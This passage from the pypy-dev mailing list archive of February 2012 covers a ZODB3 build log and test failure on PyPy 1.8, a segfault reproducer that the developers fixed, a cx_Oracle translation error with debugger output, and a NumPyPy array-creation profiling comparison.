src/BTrees/_IIBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IIBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IIBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IIBTree.pypy-18.so building 'BTrees._IFBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_IFBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IFBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IFBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IFBTree.pypy-18.so building 'BTrees._fsBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_fsBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_fsBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_fsBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_fsBTree.pypy-18.so building 'BTrees._LOBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_LOBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_LOBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_LOBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_LOBTree.pypy-18.so building 'BTrees._OLBTree' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OLBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OLBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_OLBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_OLBTree.pypy-18.so building 'BTrees._LLBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_LLBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_LLBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_LLBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_LLBTree.pypy-18.so building 'BTrees._LFBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_LFBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_LFBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_LFBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_LFBTree.pypy-18.so building 'persistent.cPersistence' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/cPersistence.c -o build/temp.linux-i686-2.7/src/persistent/cPer sistence.o src/persistent/cPersistence.c: In function ?Per_set_oid?: src/persistent/cPersistence.c:998: warning: passing argument 3 of ?PyObject _Cmp? from incompatible pointer type /home/aroldo/tmp/python/tmp-env-pypy/include/pypy_decl.h:263: note: expecte d ?long int *? but argument is of type ?int *? src/persistent/cPersistence.c: In function ?Per_set_jar?: src/persistent/cPersistence.c:1034: warning: passing argument 3 of ?PyObjec t_Cmp? from incompatible pointer type /home/aroldo/tmp/python/tmp-env-pypy/include/pypy_decl.h:263: note: expecte d ?long int *? but argument is of type ?int *? cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/ring.c -o build/temp.linux-i686-2.7/src/persistent/ring.o cc -shared build/temp.linux-i686-2.7/src/persistent/cPersistence.o build/te mp.linux-i686-2.7/src/persistent/ring.o -o build/lib.linux-i686-2.7/persistent/ cPersistence.pypy-18.so building 'persistent.cPickleCache' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/cPickleCache.c -o build/temp.linux-i686-2.7/src/persistent/cPic kleCache.o src/persistent/cPickleCache.c: In function ?cc_oid_unreferenced?: src/persistent/cPickleCache.c:655: warning: implicit declaration of functio n ?_Py_ForgetReference? cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/ring.c -o build/temp.linux-i686-2.7/src/persistent/ring.o cc -shared build/temp.linux-i686-2.7/src/persistent/cPickleCache.o build/te mp.linux-i686-2.7/src/persistent/ring.o -o build/lib.linux-i686-2.7/persistent/ cPickleCache.pypy-18.so building 'persistent.TimeStamp' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/TimeStamp.c -o build/temp.linux-i686-2.7/src/persistent/TimeSta mp.o cc -shared build/temp.linux-i686-2.7/src/persistent/TimeStamp.o -o build/li b.linux-i686-2.7/persistent/TimeStamp.pypy-18.so Installing fsdump script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing fstail script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing zeopack script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing runzeo script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing fsrefs script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing zeoctl script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing repozo script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing fsoids script to /home/aroldo/tmp/python/tmp-env-pypy/bin Installing zeopasswd script to /home/aroldo/tmp/python/tmp-env-pypy/bin Running setup.py install for transaction Running setup.py install for zc.lockfile Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages /zc/__init__.py (namespace package) Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zc.lockfile-1 .0.0-py2.7-nspkg.pth Running setup.py install for ZConfig changing mode of build/scripts-2.7/zconfig from 644 to 755 changing mode of build/scripts-2.7/zconfig_schema2html from 644 to 755 changing mode of /home/aroldo/tmp/python/tmp-env-pypy/bin/zconfig_schema2ht ml to 755 changing mode of /home/aroldo/tmp/python/tmp-env-pypy/bin/zconfig to 755 Running setup.py install for zdaemon Installing zdaemon script to /home/aroldo/tmp/python/tmp-env-pypy/bin Running setup.py install for zope.event Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages /zope/__init__.py (namespace package) Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope.event-3. 5.1-py2.7-nspkg.pth Running setup.py install for zope.interface Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages /zope/__init__.py (namespace package) Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope.interfac e-3.8.0-py2.7-nspkg.pth Successfully installed zodb3 transaction zc.lockfile ZConfig zdaemon zope.event zope.interface Cleaning up... Running the ZOBD3 tests ------------------------------- :: (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python --version Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 19:41:19) [PyPy 1.8.0 with GCC 4.4.3] (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python site-packages/ZODB/tests/testZODB.py Traceback (most recent call last): File "app_main.py", line 51, in run_toplevel File "site-packages/ZODB/tests/testZODB.py", line 15, in from persistent import Persistent File "/home/aroldo/tmp/python/tmp-env-pypy/site-packages/persistent/__init__.py", line 20, in from cPickleCache import PickleCache ImportError: unable to load extension module '/home/aroldo/tmp/python/tmp-env-p ypy/site-packages/persistent/cPickleCache.pypy-18.so': /home/aroldo/tmp/python/ tmp-env-pypy/site-packages/persistent/cPickleCache.pypy-18.so: undefined symbol : _Py_ForgetReference (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ From fjctlzy at gmail.com Mon Feb 27 12:39:22 2012 From: fjctlzy at gmail.com (Spacelee) Date: Mon, 27 Feb 2012 19:39:22 +0800 Subject: [pypy-dev] the program will make pypy say "Segment fault" Message-ID: on Ubuntu 64bit, 6G memory, 4Core, python2.7.2 Program: import datetime tmp_str1 = 'aaaaaaaaaa' * 10000 tmp_str2 = 'bbbbbbbbbb' * 10000 tmp_str3 = 'bbbbbbbbbb' * 10000 tmp_str4 = 'bbbbbbbbbb' * 10000 s = datetime.datetime.now() for i in xrange(100000): a = "%s%s%s%s" % (tmp_str1, tmp_str2, tmp_str3, tmp_str4) e = datetime.datetime.now() print str(e-s) s = datetime.datetime.now() for i in xrange(100000): a = tmp_str1 + tmp_str2 + tmp_str3 + tmp_str4 e = datetime.datetime.now() print str(e-s) Ouput: Segment Fault -- *Space Lee* -------------- next part -------------- An HTML attachment was scrubbed... URL: From coolbutuseless at gmail.com Mon Feb 27 15:04:38 2012 From: coolbutuseless at gmail.com (mike c) Date: Tue, 28 Feb 2012 00:04:38 +1000 Subject: [pypy-dev] the program will make pypy say "Segment fault" In-Reply-To: References: Message-ID: Hi All, Ronny has put a stripped down version of this bug on the tracker: https://bugs.pypy.org/issue1073 On Mon, Feb 27, 2012 at 9:39 PM, Spacelee wrote: > on Ubuntu 64bit, 6G memory, 4Core, python2.7.2 > > Program: > > > import datetime > > tmp_str1 = 'aaaaaaaaaa' * 10000 > tmp_str2 = 'bbbbbbbbbb' * 10000 > tmp_str3 = 'bbbbbbbbbb' * 10000 > tmp_str4 = 'bbbbbbbbbb' * 10000 > > > s = datetime.datetime.now() > for i in xrange(100000): > a = "%s%s%s%s" % (tmp_str1, tmp_str2, tmp_str3, tmp_str4) > e = datetime.datetime.now() > print str(e-s) > > > s = datetime.datetime.now() > for i in xrange(100000): > a = tmp_str1 + tmp_str2 + tmp_str3 + tmp_str4 > e = datetime.datetime.now() > print str(e-s) > > > > Ouput: > Segment Fault > > -- > *Space Lee* > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mustang6565 at gmail.com Mon Feb 27 15:59:11 2012 From: mustang6565 at gmail.com (Phillip Class) Date: Mon, 27 Feb 2012 14:59:11 +0000 Subject: [pypy-dev] Translation Error building with cx_Oracle Message-ID: Hello, On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest repo I am trying to build pypy with cx_Oracle mod using the command: python translate.py -Ojit targetpypystandalone.py --withmod-oracle After quite awhile it fails with the following translation errors. Can somebody please take a look? Thanks! [translation:ERROR] Error: [translation:ERROR] Traceback (most recent call last): [translation:ERROR] File "translate.py", line 309, in main [translation:ERROR] drv.proceed(goals) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed [translation:ERROR] return self._execute(goals, task_skip = self._maybe_skip()) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in _execute [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do [translation:ERROR] res = func() [translation:ERROR] File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in task_pyjitpl_lltype [translation:ERROR] backend_name=self.config.translation.jit_backend, inline=True) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in apply_jit [translation:ERROR] warmrunnerdesc.finish() [translation:ERROR] File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in finish [translation:ERROR] self.annhelper.finish() [translation:ERROR] File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish [translation:ERROR] self.finish_annotate() [translation:ERROR] File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in finish_annotate [translation:ERROR] ann.complete_helpers(self.policy) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in complete_helpers [translation:ERROR] self.complete() [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in complete [translation:ERROR] self.processblock(graph, block) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in processblock [translation:ERROR] self.flowin(graph, block) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin [translation:ERROR] self.consider_op(block.operations[i]) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in consider_op [translation:ERROR] raise_nicer_exception(op, str(graph)) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in consider_op [translation:ERROR] resultcell = consider_meth(*argcells) [translation:ERROR] File "<4506-codegen /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in consider_op_simple_call [translation:ERROR] return arg.simple_call(*args) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in simple_call [translation:ERROR] return obj.call(getbookkeeper().build_args("simple_call", args_s)) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call [translation:ERROR] return bookkeeper.pbc_call(pbc, args) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in pbc_call [translation:ERROR] results.append(desc.pycall(schedule, args, s_previous_result, op)) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in pycall [translation:ERROR] return self.funcdesc.pycall(schedule, args, s_previous_result, op) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in pycall [translation:ERROR] result = schedule(graph, inputcells) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in schedule [translation:ERROR] return self.annotator.recursivecall(graph, whence, inputcells) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in recursivecall [translation:ERROR] position_key) [translation:ERROR] File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in addpendingblock [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg [translation:ERROR] AssertionError': [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] .. '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' [translation:ERROR] Processing block: [translation:ERROR] block at 226 is a [translation:ERROR] in (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook [translation:ERROR] containing the following operations: [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] --end-- -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Mon Feb 27 16:23:42 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 27 Feb 2012 16:23:42 +0100 Subject: [pypy-dev] the program will make pypy say "Segment fault" In-Reply-To: References: Message-ID: Hi, On Mon, Feb 27, 2012 at 12:39, Spacelee wrote: > Segment Fault Thanks for the report! Fixed, probably, by b9733690c4de. The issue occurs with strings (or other variable-sized mallocs) with a number of items that is constant for the JIT, and whose total constant size is between 67584 bytes (135168 on 64-bit) and 16MB. Bah. A bient?t, Armin. From fijall at gmail.com Mon Feb 27 16:24:30 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 07:24:30 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 6:59 AM, Phillip Class wrote: > Hello, > > On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest repo I > am trying to build pypy with cx_Oracle mod using the command: > python translate.py -Ojit targetpypystandalone.py --withmod-oracle > > After quite awhile it fails with the following translation errors. Can > somebody please take a look? Thanks! > > [translation:ERROR] Error: > [translation:ERROR]? Traceback (most recent call last): > [translation:ERROR]??? File "translate.py", line 309, in main > [translation:ERROR]???? drv.proceed(goals) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed > [translation:ERROR]???? return self._execute(goals, task_skip = > self._maybe_skip()) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in > _execute > [translation:ERROR]???? res = self._do(goal, taskcallable, *args, **kwds) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do > [translation:ERROR]???? res = func() > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in > task_pyjitpl_lltype > [translation:ERROR]???? backend_name=self.config.translation.jit_backend, > inline=True) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in > apply_jit > [translation:ERROR]???? warmrunnerdesc.finish() > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in > finish > [translation:ERROR]???? self.annhelper.finish() > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish > [translation:ERROR]???? self.finish_annotate() > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in > finish_annotate > [translation:ERROR]???? ann.complete_helpers(self.policy) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in > complete_helpers > [translation:ERROR]???? self.complete() > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in > complete > [translation:ERROR]???? self.processblock(graph, block) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in > processblock > [translation:ERROR]???? self.flowin(graph, block) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin > [translation:ERROR]???? self.consider_op(block.operations[i]) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in > consider_op > [translation:ERROR]???? raise_nicer_exception(op, str(graph)) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in > consider_op > [translation:ERROR]???? resultcell = consider_meth(*argcells) > [translation:ERROR]??? File "<4506-codegen > /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in > consider_op_simple_call > [translation:ERROR]???? return arg.simple_call(*args) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in > simple_call > [translation:ERROR]???? return > obj.call(getbookkeeper().build_args("simple_call", args_s)) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call > [translation:ERROR]???? return bookkeeper.pbc_call(pbc, args) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in > pbc_call > [translation:ERROR]???? results.append(desc.pycall(schedule, args, > s_previous_result, op)) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in > pycall > [translation:ERROR]???? return self.funcdesc.pycall(schedule, args, > s_previous_result, op) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in > pycall > [translation:ERROR]???? result = schedule(graph, inputcells) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in > schedule > [translation:ERROR]???? return self.annotator.recursivecall(graph, whence, > inputcells) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in > recursivecall > [translation:ERROR]???? position_key) > [translation:ERROR]??? File > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in > addpendingblock > [translation:ERROR]???? assert annmodel.unionof(s_oldarg, s_newarg) == > s_oldarg > [translation:ERROR]? AssertionError': > [translation:ERROR] ?? ?.. v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR] ?? ?.. > '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' > [translation:ERROR] Processing block: > [translation:ERROR]? block at 226 is a 'pypy.objspace.flow.flowcontext.SpamBlock'> > [translation:ERROR]? in > (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook > [translation:ERROR]? containing the following operations: > [translation:ERROR]??????? v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR]? --end-- > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Hi Philip. This is a bit problematic without installing oracle. Can you run this again and while in pdb say what s_oldarg and s_newarg is? From fijall at gmail.com Mon Feb 27 16:29:05 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 07:29:05 -0800 Subject: [pypy-dev] ZODB3 In-Reply-To: <4F4B5296.6050903@gmx.de> References: <4F4B5296.6050903@gmx.de> Message-ID: On Mon, Feb 27, 2012 at 1:53 AM, Aroldo Souza-Leite wrote: > Hi list, > > just to keep you informed: > > the ZODB3 can be successfully installed in a PyPy-1.8 virtual environment, > but the tests fail. Below is the whole bash session I tried on Ubuntu LTS. > For the PyPy developers the interesting part might be the last section, > "Running the ZODB3 tests". > > Thanks for the great job you are doing. > > Aroldo. Hey It seems ZODB is using an internal API, notably _Py_ForgetReference. On PyPy it probably should not do anything so you can maybe try with #define _Py_ForgetReference(obj), but I don't actually know. Cheers, fijal From mmueller at python-academy.de Mon Feb 27 16:31:58 2012 From: mmueller at python-academy.de (=?windows-1252?Q?Mike_M=FCller?=) Date: Mon, 27 Feb 2012 16:31:58 +0100 Subject: [pypy-dev] NumPyPy test - array creation slow In-Reply-To: <4F4B5296.6050903@gmx.de> References: <4F4B5296.6050903@gmx.de> Message-ID: <4F4BA1EE.8050902@python-academy.de> Hi, I just tested NumPyPy a bit. I got very long run times for some tests. After some profiling, I identified the array constructor as the main time sink. This is a small example that makes the point. import cProfile try: import numpy except ImportError: import numpypy as numpy def test(): r = range(int(1e7)) # or 1e6 numpy.array(r) cProfile.run('test()') The numbers are below. NumPyPy is like a factor of five and more slower than NumPy creating an array of the same size from an existing list. I am just curious what the reason is and if you sees this go away in the near future? Thanks, Mike Mac OS X 10.7, Python 2.7.2, NumPy 2.0.0, 1e6 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.011 0.011 0.255 0.255 :1() 1 0.002 0.002 0.244 0.244 constr.py:12(test) 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.210 0.210 0.210 0.210 {numpy.core.multiarray.array} 1 0.032 0.032 0.032 0.032 {range} Mac OS X 10.7, PyPy 1.8 with NumPyPy, 1e6 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 0.955 0.955 :1() 1 0.000 0.000 0.955 0.955 constr.py:12(test) 1 0.955 0.955 0.955 0.955 {_numpypy.array} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.000 0.000 0.000 0.000 {range} Mac OS X 10.7, Python 2.7.2, NumPy 2.0.0, 1e7 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.166 0.166 2.586 2.586 :1() 1 0.016 0.016 2.420 2.420 constr.py:12(test) 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 2.065 2.065 2.065 2.065 {numpy.core.multiarray.array} 1 0.339 0.339 0.339 0.339 {range} Mac OS X 10.7, PyPy 1.8 with NumPyPy, 1e7 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 10.169 10.169 :1() 1 0.000 0.000 10.169 10.169 constr.py:12(test) 1 10.169 10.169 10.169 10.169 {_numpypy.array} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.000 0.000 0.000 0.000 {range} Windows, Python 2.6.5, NumPy 1.6.1, 1e6 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.009 0.009 0.242 0.242 :1() 1 0.000 0.000 0.234 0.234 constr.py:12(test) 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.191 0.191 0.191 0.191 {numpy.core.multiarray.array} 1 0.042 0.042 0.042 0.042 {range} Windows, PyPy 1.8 with NumPyPy, 1e6 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 1.375 1.375 :1() 1 0.000 0.000 1.375 1.375 constr.py:8(test) 1 1.375 1.375 1.375 1.375 {_numpypy.array} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.000 0.000 0.000 0.000 {range} Windows, Python 2.6.5, NumPy 1.6.1, 1e7 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.092 0.092 2.775 2.775 :1() 1 0.002 0.002 2.683 2.683 constr.py:12(test) 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 2.254 2.254 2.254 2.254 {numpy.core.multiarray.array} 1 0.427 0.427 0.427 0.427 {range} Windows, PyPy 1.8 with NumPyPy, 1e7 Ordered by: standard name ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 13.937 13.937 :1() 1 0.001 0.001 13.937 13.937 constr.py:12(test) 1 13.936 13.936 13.936 13.936 {_numpypy.array} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} 1 0.000 0.000 0.000 0.000 {range} From arigo at tunes.org Mon Feb 27 16:48:02 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 27 Feb 2012 16:48:02 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: References: <4F4B5296.6050903@gmx.de> Message-ID: Hi, On Mon, Feb 27, 2012 at 16:29, Maciej Fijalkowski wrote: > On PyPy it probably should not do anything so you can maybe try with > #define _Py_ForgetReference(obj), but I don't actually know. Yes, it looks like it doesn't do anything in release builds of CPython. It's there for debugging. A bient?t, Armin. From cfbolz at gmx.de Mon Feb 27 16:48:44 2012 From: cfbolz at gmx.de (Carl Friedrich Bolz) Date: Mon, 27 Feb 2012 16:48:44 +0100 Subject: [pypy-dev] NumPyPy test - array creation slow In-Reply-To: <4F4BA1EE.8050902@python-academy.de> References: <4F4B5296.6050903@gmx.de> <4F4BA1EE.8050902@python-academy.de> Message-ID: <4F4BA5DC.4080109@gmx.de> Hi Mike, On 02/27/2012 04:31 PM, Mike M?ller wrote: > I just tested NumPyPy a bit. I got very long run times > for some tests. After some profiling, I identified the > array constructor as the main time sink. I opened an issue so that it doesn't get lost: https://bugs.pypy.org/issue1074 Cheers, Carl Friedrich From fijall at gmail.com Mon Feb 27 17:16:36 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 08:16:36 -0800 Subject: [pypy-dev] NumPyPy test - array creation slow In-Reply-To: <4F4BA5DC.4080109@gmx.de> References: <4F4B5296.6050903@gmx.de> <4F4BA1EE.8050902@python-academy.de> <4F4BA5DC.4080109@gmx.de> Message-ID: On Mon, Feb 27, 2012 at 7:48 AM, Carl Friedrich Bolz wrote: > Hi Mike, > > > On 02/27/2012 04:31 PM, Mike M?ller wrote: >> I just tested NumPyPy a bit. I got very long run times >> for some tests. After some profiling, I identified the >> array constructor as the main time sink. > > I opened an issue so that it doesn't get lost: > > https://bugs.pypy.org/issue1074 > > Cheers, > > Carl Friedrich > Yes, array creation is kind of slow. We should look into that From phillip.d.class at gmail.com Mon Feb 27 18:39:37 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Mon, 27 Feb 2012 17:39:37 +0000 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi Maciej, In Pdb they look like this: [translation] start debugger... > /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg (Pdb+) s_oldarg SomeInstance(can_be_None=False, classdef=pypy.objspace.std.intobject.W_IntObject) (Pdb+) s_newarg SomeInstance(can_be_None=False, classdef=pypy.objspace.std.stringobject.W_StringObject) On Mon, Feb 27, 2012 at 3:24 PM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 6:59 AM, Phillip Class > wrote: > > Hello, > > > > On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest > repo I > > am trying to build pypy with cx_Oracle mod using the command: > > python translate.py -Ojit targetpypystandalone.py --withmod-oracle > > > > After quite awhile it fails with the following translation errors. Can > > somebody please take a look? Thanks! > > > > [translation:ERROR] Error: > > [translation:ERROR] Traceback (most recent call last): > > [translation:ERROR] File "translate.py", line 309, in main > > [translation:ERROR] drv.proceed(goals) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed > > [translation:ERROR] return self._execute(goals, task_skip = > > self._maybe_skip()) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, > in > > _execute > > [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do > > [translation:ERROR] res = func() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in > > task_pyjitpl_lltype > > [translation:ERROR] backend_name=self.config.translation.jit_backend, > > inline=True) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in > > apply_jit > > [translation:ERROR] warmrunnerdesc.finish() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in > > finish > > [translation:ERROR] self.annhelper.finish() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in > finish > > [translation:ERROR] self.finish_annotate() > > [translation:ERROR] File > > 